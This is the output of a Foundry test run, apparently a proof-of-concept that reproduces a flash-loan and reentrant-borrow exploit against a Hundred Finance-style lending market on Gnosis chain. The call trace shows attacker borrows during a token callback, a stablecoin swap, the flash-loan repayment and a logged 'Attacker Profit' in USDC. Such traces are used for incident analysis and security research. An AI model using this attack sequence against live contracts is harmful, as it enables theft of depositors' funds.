    │   │   │   │   │   │   │   │   │   │   │   ├─ [6328] 0x243E33aa7f6787154a8E59d3C27a66db3F8818ee::delegateToImplementation(0xc37f68e20000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496) [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   ├─ [4443] 0xfCD8570AD81e6c77b8D252bEbEBA62ed980BD64D::getAccountSnapshot(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [1310] 0xDDAfbb505ad214D7b80b1f830fcCc89B60fb7A83::balanceOf(0x243E33aa7f6787154a8E59d3C27a66db3F8818ee) [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [858] 0xf8D1677c8a0c961938bf2f9aDc3F3CFDA759A9d9::balanceOf(0x243E33aa7f6787154a8E59d3C27a66db3F8818ee) [delegatecall]
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 3991716342959 [3.991e12]
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 3991716342959 [3.991e12]
    │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0, 10588888520988515 [1.058e16], 0, 137155478109375 [1.371e14]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000259e89badc1763000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007cbdff8d3cbf
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0, 10588888520988515 [1.058e16], 0, 137155478109375 [1.371e14]
    │   │   │   │   │   │   │   │   │   │   ├─ [5011] 0x10010069DE6bD5408A6dEd075Cf6ae2498073c73::getUnderlyingPrice(0x243E33aa7f6787154a8E59d3C27a66db3F8818ee) [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [3143] 0x26C31ac71010aF62E6B486D1132E266D6298857D::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   ├─ [1410] 0x30bA871Ee7a08dBd255CdD8e7e035DAd72014E27::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 160, 100000000 [1e8], 1647295595 [1.647e9], 1647295595 [1.647e9], 160
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147419103392 [3.689e19], 100000000 [1e8], 1647295595 [1.647e9], 1647295595 [1.647e9], 36893488147419103392 [3.689e19]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 1000000000000000000000000000000 [1e30]
    │   │   │   │   │   │   │   │   │   │   ├─ [8752] 0x090a00A2De0EA83DEf700B5e216f87a5D4F394FE::getAccountSnapshot(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0, 0, 0, 200320623959977004402174592 [2.003e26]
    │   │   │   │   │   │   │   │   │   │   ├─ [5011] 0x10010069DE6bD5408A6dEd075Cf6ae2498073c73::getUnderlyingPrice(0x090a00A2De0EA83DEf700B5e216f87a5D4F394FE) [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [3143] 0x678df3415fc31947dA4324eC63212874be5a82f8::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   ├─ [1410] 0xb65566283CAcE6b281308308da0f0783a613c416::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 154, 100003197 [1e8], 1647326310 [1.647e9], 1647326310 [1.647e9], 154
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147419103386 [3.689e19], 100003197 [1e8], 1647326310 [1.647e9], 1647326310 [1.647e9], 36893488147419103386 [3.689e19]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 1000031970000000000 [1e18]
    │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   @ 0x60c5448f9600c8cfb7b7dd0290d6477ddbc2ca3e268dc1cd0c66139cf9abd0d0: 0 → 0x000000000000000000000000090a00a2de0ea83def700b5e216f87a5d4f394fe
    │   │   │   │   │   │   │   │   │   │   │   @ 0x3707462b181da5757afb393000713f9d89955f52c38cceeebf01e0b050d6ff3e: 1 → 2
    │   │   │   │   │   │   │   │   │   │   │   @ 0x4a2e63e6e34d5503e47c72a17607d4eeca85d692b435e3ddeec08dca916f5754: 0 → 1
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   │   │   ├─ [55] ContractTest::receive{value: 1270671089434800000000000}()
    │   │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   │   ├─ emit Borrow(borrower: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], borrowAmount: 1270671089434800000000000 [1.27e24], accountBorrows: 1270671089434800000000000 [1.27e24], totalBorrows: 1454207120807893627363639 [1.454e24])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 11: 0x0000000000000000000000000000000000000000000026dd7945f4cc59a3661d → 0x0000000000000000000000000000000000000000000133f0b9d9e73e6c54e137
    │   │   │   │   │   │   │   │   │   @ 9: 0x000000000000000000000000000000000000000000000000000000000142371f → 0x000000000000000000000000000000000000000000000000000000000142453f
    │   │   │   │   │   │   │   │   │   @ 12: 0x000000000000000000000000000000000000000000000000402c22fe6a2c7fb7 → 0x000000000000000000000000000000000000000000000000410e0ff099805c06
    │   │   │   │   │   │   │   │   │   @ 10: 0x0000000000000000000000000000000000000000000000000e014ff8533bdf6c → 0x0000000000000000000000000000000000000000000000000e01532673cdd34b
    │   │   │   │   │   │   │   │   │   @ 0xa20c45dd8a851b8b8653a17982859bee31b444ff681134f34d4fa90171fb1a2a: 0 → 0x000000000000000000000000000000000000000000010d1337c0b0fc396ae000
    │   │   │   │   │   │   │   │   │   @ 0xa20c45dd8a851b8b8653a17982859bee31b444ff681134f34d4fa90171fb1a2b: 0 → 0x0000000000000000000000000000000000000000000000000e01532673cdd34b
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   │   ├─ [0] console::log("Attacker xdai Balance After Borrow: %s XDAI", 792294331853537723935 [7.922e20]) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   ├─ [0] console::log("Hundred xdai Balance After Borrow: %s Xdai", 4438423354006375 [4.438e15]) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 33: 0 → 1
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xb0baf91a48f76d3b336eb976e4575084bb7fc95f341a385f1ee991aa4af6602e: 0x0000000000000000000000000000000000000000000000000000055d2baedb57 → 0x000000000000000000000000000000000000000000000000000003a164d5acaf
    │   │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x000000000000000000000000000000000000000000000000000001bbc6d92ea8
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ emit Borrow(borrower: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], borrowAmount: 1906006634152 [1.906e12], accountBorrows: 1906006634152 [1.906e12], totalBorrows: 2074023416364 [2.074e12])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xa20c45dd8a851b8b8653a17982859bee31b444ff681134f34d4fa90171fb1a2b: 0 → 0x0000000000000000000000000000000000000000000000000de11a80e1fa476b
    │   │   │   │   │   @ 11: 0x000000000000000000000000000000000000000000000000000000271e94a384 → 0x000000000000000000000000000000000000000000000000000001e2e56dd22c
    │   │   │   │   │   @ 0xa20c45dd8a851b8b8653a17982859bee31b444ff681134f34d4fa90171fb1a2a: 0 → 0x000000000000000000000000000000000000000000000000000001bbc6d92ea8
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   ├─ [1310] 0xDDAfbb505ad214D7b80b1f830fcCc89B60fb7A83::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   ├─ [858] 0xf8D1677c8a0c961938bf2f9aDc3F3CFDA759A9d9::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   └─ ← [Return] 1906006634152 [1.906e12]
    │   │   │   └─ ← [Return] 1906006634152 [1.906e12]
    │   │   ├─ [0] console::log("Attacker USDC Balance After Borrow: %s USDC", 1906006 [1.906e6]) [staticcall]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [1310] 0xDDAfbb505ad214D7b80b1f830fcCc89B60fb7A83::balanceOf(0x243E33aa7f6787154a8E59d3C27a66db3F8818ee) [staticcall]
    │   │   │   ├─ [858] 0xf8D1677c8a0c961938bf2f9aDc3F3CFDA759A9d9::balanceOf(0x243E33aa7f6787154a8E59d3C27a66db3F8818ee) [delegatecall]
    │   │   │   │   └─ ← [Return] 3991716342959 [3.991e12]
    │   │   │   └─ ← [Return] 3991716342959 [3.991e12]
    │   │   ├─ [0] console::log("Hundred USDC Balance After Borrow: %s USDC", 3991716 [3.991e6]) [staticcall]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [23977] 0xe91D153E0b41518A2Ce8Dd3D7944Fa863463a97d::deposit{value: 79229433185353772393543950335}()
    │   │   │   ├─ emit Deposit(dst: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], wad: 79229433185353772393543950335 [7.922e28])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x000000000000000000000000000000000000000100010d1337c0b0fc396adfff
    │   │   │   └─ ← [Stop]
    │   │   ├─ [564] 0xe91D153E0b41518A2Ce8Dd3D7944Fa863463a97d::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 79229433185353772393543950335 [7.922e28]
    │   │   ├─ [24453] 0xe91D153E0b41518A2Ce8Dd3D7944Fa863463a97d::approve(0x7f90122BF0700F9E7e1F688fe926940E8839F353, 79229433185353772393543950335 [7.922e28])
    │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x7f90122BF0700F9E7e1F688fe926940E8839F353, value: 79229433185353772393543950335 [7.922e28])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x40c4423f3161a9c9e7761439ef522536c8a5113146f0e1d5e690f5daf223360e: 0 → 0x000000000000000000000000000000000000000100010d1337c0b0fc396adfff
    │   │   │   └─ ← [Return] true
    │   │   ├─ [564] 0xe91D153E0b41518A2Ce8Dd3D7944Fa863463a97d::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 79229433185353772393543950335 [7.922e28]
    │   │   ├─ [91856] 0x7f90122BF0700F9E7e1F688fe926940E8839F353::exchange(0, 1, 79229433185353772393543950335 [7.922e28], 1)
    │   │   │   ├─ [18] PRECOMPILES::identity(0x23b872dd)
    │   │   │   │   └─ ← [Return] 0x23b872dd
    │   │   │   ├─ [30] PRECOMPILES::identity(0x000000000000000000000000000000000000000000000000000000000000006423b872dd0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000007f90122bf0700f9e7e1f688fe926940e8839f353000000000000000000000000000000000000000100010d1337c0b0fc396adfff)
    │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000000006423b872dd0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000007f90122bf0700f9e7e1f688fe926940e8839f353000000000000000000000000000000000000000100010d1337c0b0fc396adfff
    │   │   │   ├─ [8984] 0xe91D153E0b41518A2Ce8Dd3D7944Fa863463a97d::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x7f90122BF0700F9E7e1F688fe926940E8839F353, 79229433185353772393543950335 [7.922e28])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x7f90122BF0700F9E7e1F688fe926940E8839F353, value: 79229433185353772393543950335 [7.922e28])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x40c4423f3161a9c9e7761439ef522536c8a5113146f0e1d5e690f5daf223360e: 0x000000000000000000000000000000000000000100010d1337c0b0fc396adfff → 0
    │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x000000000000000000000000000000000000000100010d1337c0b0fc396adfff → 0
    │   │   │   │   │   @ 0x23743936839dd8930da87899762e9b3ecc03fe03411031be47813d80c1f26c4c: 0x0000000000000000000000000000000000000000001f9424ba05b1194780d314 → 0x00000000000000000000000000000000000000010020a137f1c6621580ebb313
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [21] PRECOMPILES::identity(0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000001)
    │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000001
    │   │   │   ├─ [18] PRECOMPILES::identity(0xa9059cbb)
    │   │   │   │   └─ ← [Return] 0xa9059cbb
    │   │   │   ├─ [27] PRECOMPILES::identity(0x0000000000000000000000000000000000000000000000000000000000000044a9059cbb0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000000000000000000000000000000000274d45ae5a60)
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000044a9059cbb0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000000000000000000000000000000000274d45ae5a60
    │   │   │   ├─ [14911] 0xDDAfbb505ad214D7b80b1f830fcCc89B60fb7A83::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 43212835019360 [4.321e13])
    │   │   │   │   ├─ [14453] 0xf8D1677c8a0c961938bf2f9aDc3F3CFDA759A9d9::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 43212835019360 [4.321e13]) [delegatecall]
    │   │   │   │   │   ├─ emit Transfer(from: 0x7f90122BF0700F9E7e1F688fe926940E8839F353, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 43212835019360 [4.321e13])
    │   │   │   │   │   ├─ [3907] ContractTest::onTokenTransfer(0x7f90122BF0700F9E7e1F688fe926940E8839F353, 43212835019360 [4.321e13], 0x)
    │   │   │   │   │   │   ├─ [241] 0x1b02dA8Cb0d097eB8D57A175b88c7D8b47997506::factory() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0xc35DADB65012eC5796536bD9864eD8773aBc74C4
    │   │   │   │   │   │   ├─ [644] 0xc35DADB65012eC5796536bD9864eD8773aBc74C4::getPair(0xe91D153E0b41518A2Ce8Dd3D7944Fa863463a97d, 0xDDAfbb505ad214D7b80b1f830fcCc89B60fb7A83) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0xA227c72a4055A9DC949cAE24f54535fe890d3663
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x000000000000000000000000000000000000000000000000000001bbc6d92ea8 → 0x000000000000000000000000000000000000000000000000000029090c878908
    │   │   │   │   │   │   @ 0x23743936839dd8930da87899762e9b3ecc03fe03411031be47813d80c1f26c4c: 0x000000000000000000000000000000000000000000000000000027535ec7d99b → 0x0000000000000000000000000000000000000000000000000000000619197f3b
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [21] PRECOMPILES::identity(0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000001)
    │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000001
    │   │   │   ├─ emit TokenExchange(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 0, param2: 79229433185353772393543950335 [7.922e28], param3: 1, param4: 43212835019360 [4.321e13])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb10e2d527612073b26eecdfd717e6a320cf44b4afac2b0732d9fcbe2b7fa0cf7: 0x000000000000000000000000000000000000000000000000000027514c5e4466 → 0x0000000000000000000000000000000000000000000000000000000203580940
    │   │   │   │   @ 0xb10e2d527612073b26eecdfd717e6a320cf44b4afac2b0732d9fcbe2b7fa0cf6: 0x0000000000000000000000000000000000000000001f91d4ad8752683851ec30 → 0x000000000000000000000000000000000000000100209ee7e548036471bccc2f
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000274d45ae5a60
    │   │   ├─ [8371] 0xDDAfbb505ad214D7b80b1f830fcCc89B60fb7A83::transfer(0xA227c72a4055A9DC949cAE24f54535fe890d3663, 2124157621924 [2.124e12])
    │   │   │   ├─ [7913] 0xf8D1677c8a0c961938bf2f9aDc3F3CFDA759A9d9::transfer(0xA227c72a4055A9DC949cAE24f54535fe890d3663, 2124157621924 [2.124e12]) [delegatecall]
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xA227c72a4055A9DC949cAE24f54535fe890d3663, value: 2124157621924 [2.124e12])
    │   │   │   │   ├─ [248] 0xA227c72a4055A9DC949cAE24f54535fe890d3663::onTokenTransfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2124157621924 [2.124e12], 0x)
    │   │   │   │   │   └─ ← [Revert] EvmError: Revert
    │   │   │   │   ├─ emit ContractFallbackCallFailed(: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 0xA227c72a4055A9DC949cAE24f54535fe890d3663, : 2124157621924 [2.124e12])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x247cfacee8d2369ab62372795e3deae48743e5b679b4352ba759121141379394: 1 → 0x000000000000000000000000000000000000000000000000000001ee91a916a5
    │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x000000000000000000000000000000000000000000000000000029090c878908 → 0x0000000000000000000000000000000000000000000000000000271a7ade7264
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Return] true
    │   │   ├─ [0] console::log("Repay Flashloan for : %s USDC", 2124157 [2.124e6]) [staticcall]
    │   │   │   └─ ← [Stop]
    │   │   ├─  storage changes:
    │   │   │   @ 0: 0 → 1
    │   │   │   @ 0x40c4423f3161a9c9e7761439ef522536c8a5113146f0e1d5e690f5daf223360e: 0 → 0x000000000000000000000000000000000000000100010d1337c0b0fc396adfff
    │   │   │   @ 32: 0 → 0x000000000000000000000000000000000000000000000000000001ed15d4de82
    │   │   └─ ← [Stop]
    │   ├─ [1310] 0xDDAfbb505ad214D7b80b1f830fcCc89B60fb7A83::balanceOf(0xA227c72a4055A9DC949cAE24f54535fe890d3663) [staticcall]
    │   │   ├─ [858] 0xf8D1677c8a0c961938bf2f9aDc3F3CFDA759A9d9::balanceOf(0xA227c72a4055A9DC949cAE24f54535fe890d3663) [delegatecall]
    │   │   │   └─ ← [Return] 2124157621925 [2.124e12]
    │   │   └─ ← [Return] 2124157621925 [2.124e12]
    │   ├─ [2564] 0xe91D153E0b41518A2Ce8Dd3D7944Fa863463a97d::balanceOf(0xA227c72a4055A9DC949cAE24f54535fe890d3663) [staticcall]
    │   │   └─ ← [Return] 2120530652681475777036011 [2.12e24]
    │   ├─ emit Sync(reserve0: 2124157621925 [2.124e12], reserve1: 2120530652681475777036011 [2.12e24])
    │   ├─ emit Swap(sender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 2124157621924 [2.124e12], amount1In: 0, amount0Out: 2117785149058 [2.117e12], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─  storage changes:
    │   │   @ 9: 0x00000000000000000001c2944af8a4f1ae8a54a47c599267972ca8d87a56e468 → 0x00000000000000000001c294e5c92abcd474c9d5f2fa6b4e0db750e334c9b9bc
    │   │   @ 10: 0x000000000000000000000000000000000000000220b8a2bfe67947153025e619 → 0x000000000000000000000000000000000000000220b95d6cb15a1df049a7b6e7
    │   │   @ 8: 0x623069a900000001c10a327018e44532feeb000000000000000001ed15d4de83 → 0x62306a5300000001c10a327018e44532feeb000000000000000001ee91a916a5
    │   └─ ← [Stop]
    ├─ [1310] 0xDDAfbb505ad214D7b80b1f830fcCc89B60fb7A83::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [858] 0xf8D1677c8a0c961938bf2f9aDc3F3CFDA759A9d9::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 42994684031588 [4.299e13]
    │   └─ ← [Return] 42994684031588 [4.299e13]
    ├─ [0] console::log("Attacker Profit: %s usdc", 42994684 [4.299e7]) [staticcall]
    │   └─ ← [Stop]
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 34.30s (32.90s CPU time)

Ran 2 test suites in 34.38s (34.91s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
